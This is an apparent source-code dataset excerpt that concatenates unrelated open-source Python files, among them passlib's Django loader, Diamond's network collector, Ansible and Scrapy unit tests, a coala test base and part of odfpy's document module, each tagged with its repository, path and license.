config = getattr(settings, "PASSLIB_CONTEXT", _UNSET)
if config is _UNSET:
config = "passlib-default"
if config is None:
warn("setting PASSLIB_CONFIG=None is deprecated, "
"and support will be removed in Passlib 1.8, "
"use PASSLIB_CONFIG='disabled' instead.",
DeprecationWarning)
config = "disabled"
elif not isinstance(config, (unicode, bytes, dict)):
raise ExpectedTypeError(config, "str or dict", "PASSLIB_CONFIG")
# load custom category func (if any)
get_category = getattr(settings, "PASSLIB_GET_CATEGORY", None)
if get_category and not callable(get_category):
raise ExpectedTypeError(get_category, "callable", "PASSLIB_GET_CATEGORY")
# check if we've been disabled
if config == "disabled":
if _patched: # pragma: no cover -- sanity check
log.error("didn't expect monkeypatching would be applied!")
_remove_patch()
return
# resolve any preset aliases
if isinstance(config, str) and '\n' not in config:
config = get_preset_config(config)
# setup context
_apply_patch()
password_context.load(config)
if get_category:
# NOTE: _get_category is module global which is read by
# monkeypatched functions constructed by _apply_patch()
_get_category = get_category
log.debug("passlib.ext.django loaded")
# wrap load function so we can undo any patching if something goes wrong
try:
_load()
except:
_remove_patch()
raise
#=============================================================================
# eof
#=============================================================================
| charukiewicz/beer-manager | venv/lib/python3.4/site-packages/passlib/ext/django/models.py | Python | mit | 12,558 |
# coding=utf-8
"""
The NetworkCollector class collects metrics on network interface usage
using /proc/net/dev.
#### Dependencies
* /proc/net/dev
"""
import diamond.collector
from diamond.collector import str_to_bool
import diamond.convertor
import os
import re
try:
import psutil
except ImportError:
psutil = None
class NetworkCollector(diamond.collector.Collector):
PROC = '/proc/net/dev'
def get_default_config_help(self):
config_help = super(NetworkCollector, self).get_default_config_help()
config_help.update({
'interfaces': 'List of interface types to collect',
'greedy': 'Greedy match interfaces',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(NetworkCollector, self).get_default_config()
config.update({
'path': 'network',
'interfaces': ['eth', 'bond', 'em', 'p1p', 'eno', 'enp', 'ens',
'enx'],
'byte_unit': ['bit', 'byte'],
'greedy': 'true',
})
return config
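    # Illustrative diamond.conf stanza (keys mirror the defaults above; the
    # exact section layout depends on the local diamond configuration):
    #
    #   [[NetworkCollector]]
    #   enabled = True
    #   interfaces = eth, bond, em
    #   byte_unit = bit, byte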
def collect(self):
"""
Collect network interface stats.
"""
# Initialize results
results = {}
if os.access(self.PROC, os.R_OK):
# Open File
file = open(self.PROC)
# Build Regular Expression
greed = ''
if str_to_bool(self.config['greedy']):
greed = '\S*'
exp = (('^(?:\s*)((?:%s)%s):(?:\s*)' +
'(?P<rx_bytes>\d+)(?:\s*)' +
'(?P<rx_packets>\w+)(?:\s*)' +
'(?P<rx_errors>\d+)(?:\s*)' +
'(?P<rx_drop>\d+)(?:\s*)' +
'(?P<rx_fifo>\d+)(?:\s*)' +
'(?P<rx_frame>\d+)(?:\s*)' +
'(?P<rx_compressed>\d+)(?:\s*)' +
'(?P<rx_multicast>\d+)(?:\s*)' +
'(?P<tx_bytes>\d+)(?:\s*)' +
'(?P<tx_packets>\w+)(?:\s*)' +
'(?P<tx_errors>\d+)(?:\s*)' +
'(?P<tx_drop>\d+)(?:\s*)' +
'(?P<tx_fifo>\d+)(?:\s*)' +
'(?P<tx_colls>\d+)(?:\s*)' +
'(?P<tx_carrier>\d+)(?:\s*)' +
'(?P<tx_compressed>\d+)(?:.*)$') %
(('|'.join(self.config['interfaces'])), greed))
reg = re.compile(exp)
# Match Interfaces
for line in file:
match = reg.match(line)
if match:
device = match.group(1)
results[device] = match.groupdict()
# Close File
file.close()
else:
if not psutil:
self.log.error('Unable to import psutil')
self.log.error('No network metrics retrieved')
return None
network_stats = psutil.network_io_counters(True)
for device in network_stats.keys():
network_stat = network_stats[device]
results[device] = {}
results[device]['rx_bytes'] = network_stat.bytes_recv
results[device]['tx_bytes'] = network_stat.bytes_sent
results[device]['rx_packets'] = network_stat.packets_recv
results[device]['tx_packets'] = network_stat.packets_sent
for device in results:
stats = results[device]
for s, v in stats.items():
# Get Metric Name
metric_name = '.'.join([device, s])
# Get Metric Value
metric_value = self.derivative(metric_name,
long(v),
diamond.collector.MAX_COUNTER)
# Convert rx_bytes and tx_bytes
if s == 'rx_bytes' or s == 'tx_bytes':
convertor = diamond.convertor.binary(value=metric_value,
unit='byte')
for u in self.config['byte_unit']:
                        # Publish Converted Metric
self.publish(metric_name.replace('bytes', u),
convertor.get(unit=u), 2)
else:
# Publish Metric Derivative
self.publish(metric_name, metric_value)
return None
| dcsquared13/Diamond | src/collectors/network/network.py | Python | mit | 4,536 |
# Copyright 2015 Abhijit Menon-Sen <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import string
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch
from ansible.inventory.manager import InventoryManager, split_host_pattern
from ansible.vars.manager import VariableManager
from units.mock.loader import DictDataLoader
class TestInventory(unittest.TestCase):
patterns = {
'a': ['a'],
'a, b': ['a', 'b'],
'a , b': ['a', 'b'],
' a,b ,c[1:2] ': ['a', 'b', 'c[1:2]'],
'9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9'],
'9a01:7f8:191:7701::9,9a01:7f8:191:7701::9,foo': ['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo'],
'foo[1:2]': ['foo[1:2]'],
'a::b': ['a::b'],
'a:b': ['a', 'b'],
' a : b ': ['a', 'b'],
'foo:bar:baz[1:2]': ['foo', 'bar', 'baz[1:2]'],
}
pattern_lists = [
[['a'], ['a']],
[['a', 'b'], ['a', 'b']],
[['a, b'], ['a', 'b']],
[['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9,foo'],
['9a01:7f8:191:7701::9', '9a01:7f8:191:7701::9', 'foo']]
]
# pattern_string: [ ('base_pattern', (a,b)), ['x','y','z'] ]
# a,b are the bounds of the subscript; x..z are the results of the subscript
# when applied to string.ascii_letters.
subscripts = {
'a': [('a', None), list(string.ascii_letters)],
'a[0]': [('a', (0, None)), ['a']],
'a[1]': [('a', (1, None)), ['b']],
'a[2:3]': [('a', (2, 3)), ['c', 'd']],
'a[-1]': [('a', (-1, None)), ['Z']],
'a[-2]': [('a', (-2, None)), ['Y']],
'a[48:]': [('a', (48, -1)), ['W', 'X', 'Y', 'Z']],
'a[49:]': [('a', (49, -1)), ['X', 'Y', 'Z']],
'a[1:]': [('a', (1, -1)), list(string.ascii_letters[1:])],
}
ranges_to_expand = {
'a[1:2]': ['a1', 'a2'],
'a[1:10:2]': ['a1', 'a3', 'a5', 'a7', 'a9'],
'a[a:b]': ['aa', 'ab'],
'a[a:i:3]': ['aa', 'ad', 'ag'],
'a[a:b][c:d]': ['aac', 'aad', 'abc', 'abd'],
'a[0:1][2:3]': ['a02', 'a03', 'a12', 'a13'],
'a[a:b][2:3]': ['aa2', 'aa3', 'ab2', 'ab3'],
}
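    # e.g. 'a[1:10:2]' expands to a1, a3, ..., a9: start:stop:step ranges are
    # inclusive, and alphabetic bounds such as a[a:b] expand over letters.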
def setUp(self):
fake_loader = DictDataLoader({})
self.i = InventoryManager(loader=fake_loader, sources=[None])
def test_split_patterns(self):
for p in self.patterns:
r = self.patterns[p]
self.assertEqual(r, split_host_pattern(p))
for p, r in self.pattern_lists:
self.assertEqual(r, split_host_pattern(p))
def test_ranges(self):
for s in self.subscripts:
r = self.subscripts[s]
self.assertEqual(r[0], self.i._split_subscript(s))
self.assertEqual(
r[1],
self.i._apply_subscript(
list(string.ascii_letters),
r[0][1]
)
)
class InventoryDefaultGroup(unittest.TestCase):
def test_empty_inventory(self):
inventory = self._get_inventory('')
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
self.assertFalse(inventory.groups['all'].get_hosts())
self.assertFalse(inventory.groups['ungrouped'].get_hosts())
def test_ini(self):
self._test_default_groups("""
host1
host2
host3
[servers]
host3
host4
host5
""")
def test_ini_explicit_ungrouped(self):
self._test_default_groups("""
[ungrouped]
host1
host2
host3
[servers]
host3
host4
host5
""")
def _get_inventory(self, inventory_content):
fake_loader = DictDataLoader({__file__: inventory_content})
return InventoryManager(loader=fake_loader, sources=[__file__])
def _test_default_groups(self, inventory_content):
inventory = self._get_inventory(inventory_content)
self.assertIn('all', inventory.groups)
self.assertIn('ungrouped', inventory.groups)
all_hosts = set(host.name for host in inventory.groups['all'].get_hosts())
self.assertEqual(set(['host1', 'host2', 'host3', 'host4', 'host5']), all_hosts)
ungrouped_hosts = set(host.name for host in inventory.groups['ungrouped'].get_hosts())
self.assertEqual(set(['host1', 'host2', 'host3']), ungrouped_hosts)
servers_hosts = set(host.name for host in inventory.groups['servers'].get_hosts())
self.assertEqual(set(['host3', 'host4', 'host5']), servers_hosts)
| tux-00/ansible | test/units/inventory/test_inventory.py | Python | gpl-3.0 | 5,504 |
import unittest
from scrapy.contrib.downloadermiddleware.redirect import RedirectMiddleware
from scrapy.spider import BaseSpider
from scrapy.exceptions import IgnoreRequest
from scrapy.http import Request, Response, HtmlResponse, Headers
class RedirectMiddlewareTest(unittest.TestCase):
def setUp(self):
self.spider = BaseSpider('foo')
self.mw = RedirectMiddleware()
def test_priority_adjust(self):
req = Request('http://a.com')
rsp = Response('http://a.com', headers={'Location': 'http://a.com/redirected'}, status=301)
req2 = self.mw.process_response(req, rsp, self.spider)
assert req2.priority > req.priority
def test_redirect_301(self):
def _test(method):
url = 'http://www.example.com/301'
url2 = 'http://www.example.com/redirected'
req = Request(url, method=method)
rsp = Response(url, headers={'Location': url2}, status=301)
req2 = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req2, Request)
self.assertEqual(req2.url, url2)
self.assertEqual(req2.method, method)
            # a response with a 3XX status code but no Location header should be ignored
del rsp.headers['Location']
assert self.mw.process_response(req, rsp, self.spider) is rsp
_test('GET')
_test('POST')
_test('HEAD')
def test_dont_redirect(self):
url = 'http://www.example.com/301'
url2 = 'http://www.example.com/redirected'
req = Request(url, meta={'dont_redirect': True})
rsp = Response(url, headers={'Location': url2}, status=301)
r = self.mw.process_response(req, rsp, self.spider)
assert isinstance(r, Response)
assert r is rsp
def test_redirect_302(self):
url = 'http://www.example.com/302'
url2 = 'http://www.example.com/redirected2'
req = Request(url, method='POST', body='test',
headers={'Content-Type': 'text/plain', 'Content-length': '4'})
rsp = Response(url, headers={'Location': url2}, status=302)
req2 = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req2, Request)
self.assertEqual(req2.url, url2)
self.assertEqual(req2.method, 'GET')
assert 'Content-Type' not in req2.headers, \
"Content-Type header must not be present in redirected request"
assert 'Content-Length' not in req2.headers, \
"Content-Length header must not be present in redirected request"
assert not req2.body, \
"Redirected body must be empty, not '%s'" % req2.body
        # a response with a 3XX status code but no Location header should be ignored
del rsp.headers['Location']
assert self.mw.process_response(req, rsp, self.spider) is rsp
def test_redirect_302_head(self):
url = 'http://www.example.com/302'
url2 = 'http://www.example.com/redirected2'
req = Request(url, method='HEAD')
rsp = Response(url, headers={'Location': url2}, status=302)
req2 = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req2, Request)
self.assertEqual(req2.url, url2)
self.assertEqual(req2.method, 'HEAD')
        # a response with a 3XX status code but no Location header should be ignored
del rsp.headers['Location']
assert self.mw.process_response(req, rsp, self.spider) is rsp
def test_meta_refresh(self):
body = """<html>
<head><meta http-equiv="refresh" content="5;url=http://example.org/newpage" /></head>
</html>"""
req = Request(url='http://example.org')
rsp = HtmlResponse(url='http://example.org', body=body)
req2 = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req2, Request)
self.assertEqual(req2.url, 'http://example.org/newpage')
def test_meta_refresh_with_high_interval(self):
        # a meta-refresh with a high interval doesn't trigger a redirect
body = """<html>
<head><meta http-equiv="refresh" content="1000;url=http://example.org/newpage" /></head>
</html>"""
req = Request(url='http://example.org')
rsp = HtmlResponse(url='http://example.org', body=body)
rsp2 = self.mw.process_response(req, rsp, self.spider)
assert rsp is rsp2
    def test_meta_refresh_through_posted_request(self):
body = """<html>
<head><meta http-equiv="refresh" content="5;url=http://example.org/newpage" /></head>
</html>"""
req = Request(url='http://example.org', method='POST', body='test',
headers={'Content-Type': 'text/plain', 'Content-length': '4'})
rsp = HtmlResponse(url='http://example.org', body=body)
req2 = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req2, Request)
self.assertEqual(req2.url, 'http://example.org/newpage')
self.assertEqual(req2.method, 'GET')
assert 'Content-Type' not in req2.headers, \
"Content-Type header must not be present in redirected request"
assert 'Content-Length' not in req2.headers, \
"Content-Length header must not be present in redirected request"
assert not req2.body, \
"Redirected body must be empty, not '%s'" % req2.body
def test_max_redirect_times(self):
self.mw.max_redirect_times = 1
req = Request('http://scrapytest.org/302')
rsp = Response('http://scrapytest.org/302', headers={'Location': '/redirected'}, status=302)
req = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req, Request)
assert 'redirect_times' in req.meta
self.assertEqual(req.meta['redirect_times'], 1)
self.assertRaises(IgnoreRequest, self.mw.process_response, req, rsp, self.spider)
def test_ttl(self):
self.mw.max_redirect_times = 100
req = Request('http://scrapytest.org/302', meta={'redirect_ttl': 1})
rsp = Response('http://www.scrapytest.org/302', headers={'Location': '/redirected'}, status=302)
req = self.mw.process_response(req, rsp, self.spider)
assert isinstance(req, Request)
self.assertRaises(IgnoreRequest, self.mw.process_response, req, rsp, self.spider)
def test_redirect_urls(self):
req1 = Request('http://scrapytest.org/first')
rsp1 = Response('http://scrapytest.org/first', headers={'Location': '/redirected'}, status=302)
req2 = self.mw.process_response(req1, rsp1, self.spider)
rsp2 = Response('http://scrapytest.org/redirected', headers={'Location': '/redirected2'}, status=302)
req3 = self.mw.process_response(req2, rsp2, self.spider)
self.assertEqual(req2.url, 'http://scrapytest.org/redirected')
self.assertEqual(req2.meta['redirect_urls'], ['http://scrapytest.org/first'])
self.assertEqual(req3.url, 'http://scrapytest.org/redirected2')
self.assertEqual(req3.meta['redirect_urls'], ['http://scrapytest.org/first', 'http://scrapytest.org/redirected'])
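# Taken together, the last three tests cover the redirect bookkeeping the
# middleware keeps in request.meta: 'redirect_times' counts hops,
# 'redirect_ttl' caps them per request, and 'redirect_urls' records the chain
# of URLs already visited.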
if __name__ == "__main__":
unittest.main()
| mzdaniel/oh-mainline | vendor/packages/scrapy/scrapy/tests/test_downloadermiddleware_redirect.py | Python | agpl-3.0 | 7,244 |
import unittest
class StringProcessingTestBase(unittest.TestCase):
# The backslash character. Needed since there are limitations when
# using backslashes at the end of raw-strings in front of the
# terminating " or '.
bs = "\\"
# Basic test strings all StringProcessing functions should test.
test_strings = [
r"out1 'escaped-escape: \\ ' out2",
r"out1 'escaped-quote: \' ' out2",
r"out1 'escaped-anything: \X ' out2",
r"out1 'two escaped escapes: \\\\ ' out2",
r"out1 'escaped-quote at end: \'' out2",
r"out1 'escaped-escape at end: \\' out2",
r"out1 'str1' out2 'str2' out2",
r"out1 \' 'str1' out2 'str2' out2",
r"out1 \\\' 'str1' out2 'str2' out2",
r"out1 \\ 'str1' out2 'str2' out2",
r"out1 \\\\ 'str1' out2 'str2' out2",
r"out1 \\'str1' out2 'str2' out2",
r"out1 \\\\'str1' out2 'str2' out2",
r"out1 'str1''str2''str3' out2",
r"",
r"out1 out2 out3",
bs,
2 * bs]
# Test string for multi-pattern tests (since we want to variate the
# pattern, not the test string).
multi_pattern_test_string = (r"abcabccba###\\13q4ujsabbc\+'**'ac"
r"###.#.####-ba")
# Multiple patterns for the multi-pattern tests.
multi_patterns = [r"abc",
r"ab",
r"ab|ac",
2 * bs,
r"#+",
r"(a)|(b)|(#.)",
r"(?:a(b)*c)+",
r"1|\+"]
# Test strings for the remove_empty_matches feature (alias auto-trim).
auto_trim_test_pattern = r";"
auto_trim_test_strings = [r";;;;;;;;;;;;;;;;",
r"\\;\\\\\;\\#;\\\';;\;\\\\;+ios;;",
r"1;2;3;4;5;6;",
r"1;2;3;4;5;6;7",
r"",
r"Hello world",
r"\;",
r"\\;",
r"abc;a;;;;;asc"]
# Test strings for search-in-between functions.
search_in_between_begin_pattern = r"("
search_in_between_end_pattern = r")"
search_in_between_test_strings = [
r"()assk(This is a word)and((in a word) another ) one anyway.",
r"bcc5(((((((((((((((((((1)2)3)))))))))))))))))",
r"Let's (do (it ) more ) complicated ) ) ) () (hello.)",
r"()assk\\(This\ is a word\)and((in a\\\ word\\\\\) another \)) "
r"one anyway.",
r"bcc5\(\(\((((((\\\(((((((((((1)2)3))\\\\\)))))))))))))\)\)",
r"Let's \(do (it ) more ) \\ complicated ) ) ) () (hello.)\\z"]
@staticmethod
def _construct_message(func, args, kwargs):
"""
Constructs the error message for the call result assertions.
:param func: The function that was called.
:param args: The argument tuple the function was invoked with.
:param kwargs: The named arguments dict the function was invoked with.
        :return: The error message.
"""
args = [repr(x) for x in args]
kwargs = [str(key) + '=' + repr(value)
for key, value in kwargs.items()]
return "Called {}({}).".format(func.__name__, ", ".join(args + kwargs))
def assertResultsEqual(self,
func,
invocation_and_results,
postprocess=lambda result: result):
"""
Tests each given invocation against the given results with the
specified function.
:param func: The function to test.
:param invocation_and_results: A dict containing the invocation tuple
as key and the result as value.
:param postprocess: A function that shall process the
returned result from the tested
function. The function must accept only
one parameter as postprocessing input.
Performs no postprocessing by default.
"""
for args, result in invocation_and_results.items():
self.assertEqual(
postprocess(func(*args)),
result,
self._construct_message(func, args, {}))
def assertResultsEqualEx(self,
func,
invocation_and_results,
postprocess=lambda result: result):
"""
Tests each given invocation against the given results with the
specified function. This is an extended version of
``assertResultsEqual()`` that supports also ``**kwargs``.
:param func: The function to test.
:param invocation_and_results: A dict containing the invocation tuple
as key and the result as value. The
tuple contains (args, kwargs).
:param postprocess: A function that shall process the
returned result from the tested
function. The function must accept only
one parameter as postprocessing input.
Performs no postprocessing by default.
"""
for (args, kwargs), result in invocation_and_results.items():
self.assertEqual(
postprocess(func(*args, **kwargs)),
result,
self._construct_message(func, args, kwargs))
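# Illustrative subclass usage (hypothetical function and expectations):
#
#   class MySplitTest(StringProcessingTestBase):
#       def test_split(self):
#           self.assertResultsEqual(
#               my_split,  # hypothetical function under test
#               {(self.test_strings[14],): []},
#               postprocess=list)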
| yland/coala | tests/parsing/StringProcessing/StringProcessingTestBase.py | Python | agpl-3.0 | 5,848 |
# Copyright (c) 2018 Cisco and/or its affiliates.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import
import pytest
from units.modules.utils import set_module_args, exit_json, fail_json, AnsibleFailJson, AnsibleExitJson
from ansible.module_utils import basic
from ansible.module_utils.network.ftd.common import FtdConfigurationError, FtdServerError, FtdUnexpectedResponse
from ansible.module_utils.network.ftd.configuration import FtdInvalidOperationNameError, CheckModeException
from ansible.module_utils.network.ftd.fdm_swagger_client import ValidationError
from ansible.modules.network.ftd import ftd_configuration
class TestFtdConfiguration(object):
module = ftd_configuration
@pytest.fixture(autouse=True)
def module_mock(self, mocker):
return mocker.patch.multiple(basic.AnsibleModule, exit_json=exit_json, fail_json=fail_json)
@pytest.fixture(autouse=True)
def connection_mock(self, mocker):
connection_class_mock = mocker.patch('ansible.modules.network.ftd.ftd_configuration.Connection')
return connection_class_mock.return_value
@pytest.fixture
def resource_mock(self, mocker):
resource_class_mock = mocker.patch('ansible.modules.network.ftd.ftd_configuration.BaseConfigurationResource')
resource_instance = resource_class_mock.return_value
return resource_instance.execute_operation
def test_module_should_fail_when_ftd_invalid_operation_name_error(self, resource_mock):
operation_name = 'test name'
resource_mock.side_effect = FtdInvalidOperationNameError(operation_name)
result = self._run_module_with_fail_json({'operation': operation_name})
assert result['failed']
assert 'Invalid operation name provided: %s' % operation_name == result['msg']
def test_module_should_fail_when_ftd_configuration_error(self, resource_mock):
operation_name = 'test name'
msg = 'Foo error.'
resource_mock.side_effect = FtdConfigurationError(msg)
result = self._run_module_with_fail_json({'operation': operation_name})
assert result['failed']
assert 'Failed to execute %s operation because of the configuration error: %s' % (operation_name, msg) == \
result['msg']
def test_module_should_fail_when_ftd_server_error(self, resource_mock):
operation_name = 'test name'
code = 500
response = {'error': 'foo'}
resource_mock.side_effect = FtdServerError(response, code)
result = self._run_module_with_fail_json({'operation': operation_name})
assert result['failed']
assert 'Server returned an error trying to execute %s operation. Status code: %s. ' \
'Server response: %s' % (operation_name, code, response) == \
result['msg']
def test_module_should_fail_when_validation_error(self, resource_mock):
operation_name = 'test name'
msg = 'Foo error.'
resource_mock.side_effect = ValidationError(msg)
result = self._run_module_with_fail_json({'operation': operation_name})
assert result['failed']
assert msg == result['msg']
def test_module_should_fail_when_unexpected_server_response(self, resource_mock):
operation_name = 'test name'
msg = 'Foo error.'
resource_mock.side_effect = FtdUnexpectedResponse(msg)
result = self._run_module_with_fail_json({'operation': operation_name})
assert result['failed']
assert msg == result['msg']
def test_module_should_fail_when_check_mode_exception(self, resource_mock):
operation_name = 'test name'
msg = 'Foo error.'
resource_mock.side_effect = CheckModeException(msg)
result = self._run_module({'operation': operation_name})
assert not result['changed']
def test_module_should_run_successful(self, resource_mock):
operation_name = 'test name'
resource_mock.return_value = 'ok'
result = self._run_module({'operation': operation_name})
assert result['response'] == 'ok'
def _run_module(self, module_args):
set_module_args(module_args)
with pytest.raises(AnsibleExitJson) as ex:
self.module.main()
return ex.value.args[0]
def _run_module_with_fail_json(self, module_args):
set_module_args(module_args)
with pytest.raises(AnsibleFailJson) as exc:
self.module.main()
result = exc.value.args[0]
return result
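    # These helpers drive the module the way Ansible would: the module_mock
    # fixture patches exit_json/fail_json to raise AnsibleExitJson and
    # AnsibleFailJson, so each run's result dict is recovered from the raised
    # exception's arguments.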
| Jorge-Rodriguez/ansible | test/units/modules/network/ftd/test_ftd_configuration.py | Python | gpl-3.0 | 5,145 |
# -*- coding: utf-8 -*-
# Copyright (C) 2006-2010 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
__doc__="""Use OpenDocument to generate your documents."""
import zipfile, time, sys, mimetypes, copy
from cStringIO import StringIO
from namespaces import *
import manifest, meta
from office import *
import element
from attrconverters import make_NCName
from xml.sax.xmlreader import InputSource
from odfmanifest import manifestlist
__version__= TOOLSVERSION
_XMLPROLOGUE = u"<?xml version='1.0' encoding='UTF-8'?>\n"
UNIXPERMS = 0100644 << 16L # -rw-r--r--
IS_FILENAME = 0
IS_IMAGE = 1
# We need at least Python 2.2
assert sys.version_info[0]>=2 and sys.version_info[1] >= 2
#sys.setrecursionlimit(100)
# The recursion limit is set conservatively so that mistakes like
# s = content(); s.addElement(s) won't eat up too much processor time.
odmimetypes = {
'application/vnd.oasis.opendocument.text': '.odt',
'application/vnd.oasis.opendocument.text-template': '.ott',
'application/vnd.oasis.opendocument.graphics': '.odg',
'application/vnd.oasis.opendocument.graphics-template': '.otg',
'application/vnd.oasis.opendocument.presentation': '.odp',
'application/vnd.oasis.opendocument.presentation-template': '.otp',
'application/vnd.oasis.opendocument.spreadsheet': '.ods',
'application/vnd.oasis.opendocument.spreadsheet-template': '.ots',
'application/vnd.oasis.opendocument.chart': '.odc',
'application/vnd.oasis.opendocument.chart-template': '.otc',
'application/vnd.oasis.opendocument.image': '.odi',
'application/vnd.oasis.opendocument.image-template': '.oti',
'application/vnd.oasis.opendocument.formula': '.odf',
'application/vnd.oasis.opendocument.formula-template': '.otf',
'application/vnd.oasis.opendocument.text-master': '.odm',
'application/vnd.oasis.opendocument.text-web': '.oth',
}
class OpaqueObject:
def __init__(self, filename, mediatype, content=None):
self.mediatype = mediatype
self.filename = filename
self.content = content
class OpenDocument:
""" A class to hold the content of an OpenDocument document
Use the xml method to write the XML
source to the screen or to a file
d = OpenDocument(mimetype)
fd.write(d.xml())
"""
thumbnail = None
def __init__(self, mimetype, add_generator=True):
self.mimetype = mimetype
self.childobjects = []
self._extra = []
self.folder = "" # Always empty for toplevel documents
self.topnode = Document(mimetype=self.mimetype)
self.topnode.ownerDocument = self
self.clear_caches()
self.Pictures = {}
self.meta = Meta()
self.topnode.addElement(self.meta)
if add_generator:
self.meta.addElement(meta.Generator(text=TOOLSVERSION))
self.scripts = Scripts()
self.topnode.addElement(self.scripts)
self.fontfacedecls = FontFaceDecls()
self.topnode.addElement(self.fontfacedecls)
self.settings = Settings()
self.topnode.addElement(self.settings)
self.styles = Styles()
self.topnode.addElement(self.styles)
self.automaticstyles = AutomaticStyles()
self.topnode.addElement(self.automaticstyles)
self.masterstyles = MasterStyles()
self.topnode.addElement(self.masterstyles)
self.body = Body()
self.topnode.addElement(self.body)
def rebuild_caches(self, node=None):
if node is None: node = self.topnode
self.build_caches(node)
for e in node.childNodes:
if e.nodeType == element.Node.ELEMENT_NODE:
self.rebuild_caches(e)
def clear_caches(self):
self.element_dict = {}
self._styles_dict = {}
self._styles_ooo_fix = {}
def build_caches(self, element):
""" Called from element.py
"""
if not self.element_dict.has_key(element.qname):
self.element_dict[element.qname] = []
self.element_dict[element.qname].append(element)
if element.qname == (STYLENS, u'style'):
self.__register_stylename(element) # Add to style dictionary
styleref = element.getAttrNS(TEXTNS,u'style-name')
if styleref is not None and self._styles_ooo_fix.has_key(styleref):
element.setAttrNS(TEXTNS,u'style-name', self._styles_ooo_fix[styleref])
def __register_stylename(self, element):
''' Register a style. But there are three style dictionaries:
office:styles, office:automatic-styles and office:master-styles
Chapter 14
'''
name = element.getAttrNS(STYLENS, u'name')
if name is None:
return
if element.parentNode.qname in ((OFFICENS,u'styles'), (OFFICENS,u'automatic-styles')):
if self._styles_dict.has_key(name):
newname = 'M'+name # Rename style
self._styles_ooo_fix[name] = newname
# From here on all references to the old name will refer to the new one
name = newname
element.setAttrNS(STYLENS, u'name', name)
self._styles_dict[name] = element
def toXml(self, filename=''):
xml=StringIO()
xml.write(_XMLPROLOGUE)
self.body.toXml(0, xml)
if not filename:
return xml.getvalue()
else:
f=file(filename,'w')
f.write(xml.getvalue())
f.close()
def xml(self):
""" Generates the full document as an XML file
Always written as a bytestream in UTF-8 encoding
"""
self.__replaceGenerator()
xml=StringIO()
xml.write(_XMLPROLOGUE)
self.topnode.toXml(0, xml)
return xml.getvalue()
def contentxml(self):
""" Generates the content.xml file
Always written as a bytestream in UTF-8 encoding
"""
xml=StringIO()
xml.write(_XMLPROLOGUE)
x = DocumentContent()
x.write_open_tag(0, xml)
if self.scripts.hasChildNodes():
self.scripts.toXml(1, xml)
if self.fontfacedecls.hasChildNodes():
self.fontfacedecls.toXml(1, xml)
a = AutomaticStyles()
stylelist = self._used_auto_styles([self.styles, self.automaticstyles, self.body])
if len(stylelist) > 0:
a.write_open_tag(1, xml)
for s in stylelist:
s.toXml(2, xml)
a.write_close_tag(1, xml)
else:
a.toXml(1, xml)
self.body.toXml(1, xml)
x.write_close_tag(0, xml)
return xml.getvalue()
def __manifestxml(self):
""" Generates the manifest.xml file
        The self.manifest isn't available until the document is being saved
"""
xml=StringIO()
xml.write(_XMLPROLOGUE)
self.manifest.toXml(0,xml)
return xml.getvalue()
def metaxml(self):
""" Generates the meta.xml file """
self.__replaceGenerator()
x = DocumentMeta()
x.addElement(self.meta)
xml=StringIO()
xml.write(_XMLPROLOGUE)
x.toXml(0,xml)
return xml.getvalue()
def settingsxml(self):
""" Generates the settings.xml file """
x = DocumentSettings()
x.addElement(self.settings)
xml=StringIO()
xml.write(_XMLPROLOGUE)
x.toXml(0,xml)
return xml.getvalue()
def _parseoneelement(self, top, stylenamelist):
""" Finds references to style objects in master-styles
            and adds the style name to the style list if not already there.
Recursive
"""
for e in top.childNodes:
if e.nodeType == element.Node.ELEMENT_NODE:
for styleref in (
(CHARTNS,u'style-name'),
(DRAWNS,u'style-name'),
(DRAWNS,u'text-style-name'),
(PRESENTATIONNS,u'style-name'),
(STYLENS,u'data-style-name'),
(STYLENS,u'list-style-name'),
(STYLENS,u'page-layout-name'),
(STYLENS,u'style-name'),
(TABLENS,u'default-cell-style-name'),
(TABLENS,u'style-name'),
(TEXTNS,u'style-name') ):
if e.getAttrNS(styleref[0],styleref[1]):
stylename = e.getAttrNS(styleref[0],styleref[1])
if stylename not in stylenamelist:
stylenamelist.append(stylename)
stylenamelist = self._parseoneelement(e, stylenamelist)
return stylenamelist
def _used_auto_styles(self, segments):
""" Loop through the masterstyles elements, and find the automatic
styles that are used. These will be added to the automatic-styles
